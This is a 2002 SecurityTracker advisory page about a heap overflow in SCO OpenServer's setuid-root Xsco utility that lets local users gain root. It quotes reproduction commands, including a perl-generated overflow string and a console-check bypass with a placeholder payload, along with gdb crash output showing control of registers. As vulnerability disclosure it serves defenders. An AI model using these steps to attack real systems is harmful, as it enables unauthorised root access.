SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Xsco Vendors:   Caldera/SCO
Caldera/SCO OpenServer Xsco Utility Heap Overflow May Let Local Users Gain Root Privileges
SecurityTracker Alert ID:  1004514
SecurityTracker URL:  http://securitytracker.com/id/1004514
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 11 2002
Impact:   Execution of arbitrary code via local system, Root access via local system
Exploit Included:  Yes  

Description:   A heap overflow has been reported in Caldera's (SCO's) OpenServer Xsco utility. A local user may be able to obtain root level privileges on the system.

Strategic Reconnaissance Team issued an advisory warning that the SCO OpenServer Xsco application contains the same heap overflow that was previously reported in Xsun.

By default, the SCO OpenServer Xsco application is installed with set user id (suid) root privileges. A local user could exploit this overflow to gain root access on the system.

A demonstration exploit transcript is provided:

bash-2.03$ ./Xsco :1 -co <b0f here> -crt /dev/console

Tue Jun 11 10:32:59 2002
Couldn't open RGB_DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
...
Segmentation Fault

The vendor has reportedly been notified.

Impact:   A local user may be able to execute arbitrary shell code with root privileges to gain root access on the system.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.caldera.com/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  UNIX (Open UNIX-SCO)
Underlying OS Comments:  OpenServer 5.x

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Caldera Issues Fix for Open UNIX/UnixWare) Caldera/SCO OpenServer Xsco Utility Heap Overflow May Let Local Users Gain Root Privileges
Caldera has released a fix.



 Source Message Contents

Subject:  SCO Openserver Xsco heap overflow.


======================================================================

Strategic Reconnaissance Team Security Advisory (SRT2002-06-11-1037)

Topic  : SCO OpenServer Xsco heap overflow
Date   : June 11, 2002
Credit : KF dotslash[at]snosoft.com
Site   : http://www.snosoft.com

======================================================================

.: Description:
---------------

 The SCO OpenServer Xsco application is installed setuid root by
 default. Xsco contains the same heap overflow that Xsun has.

 bash-2.03$ cd /opt/K/SCO/XServer/5.2.2a/usr/bin/X11
 bash-2.03$ ls -al Xsco
 -rwsr-xr-x   1 root     bin      1333588 Dec  9  1999 Xsco

 If you attempt the same syntax used to overflow Xsun it appears
 to be non exploitable due to not having console permission. This
 is easily bypassed as shown below in the Impact section.

 bash-2.03$ ./Xsco :1 -co `perl -e 'print "A" x 9000'`

 Tue Jun 11 10:31:56 2002
 The X Server must be run on the console.
 Make sure you are not on a serial line
 and are not using rlogin or usemouse.

.: Impact:
----------

 If properly exploited the following could be used to take root
 on the server with the Xsco binary.

 bash-2.03$ ./Xsco :1 -co <b0f here> -crt /dev/console

 Tue Jun 11 10:32:59 2002
 Couldn't open RGB_DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 ...
 Segmentation Fault

 0x8164073 in _grantpt ()
 (gdb) bt
 #0  0x8164073 in _grantpt ()
 #1  0x8164532 in malloc ()
 #2  0x80027103 in _s_a_get ()
 #3  0x81594bc in _ptsname ()
 #4  0x8087526 in wctype ()
 #5  0x8085e95 in wctype ()
 #6  0x80745f4 in wctype ()
 #7  0x804d69b in wctype ()

 (gdb) i r
 eax            0x41414141       1094795585
 ecx            0x495b38d4       1230715092
 edx            0x0      0
 ebx            0x18     24
 esp            0x8045814        0x8045814
 ebp            0x8045834        0x8045834
 esi            0x41414140       1094795584
 edi            0x819f794        135919508
 eip            0x8164073        0x8164073

.: Systems Affected:
--------------------

 SCO/Caldera OpenServer 5.x

.: Solution:
------------

 The vendor was notified and is diligently working on a fix.
 A work around is currently unknown.

======================================================================


-KF



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC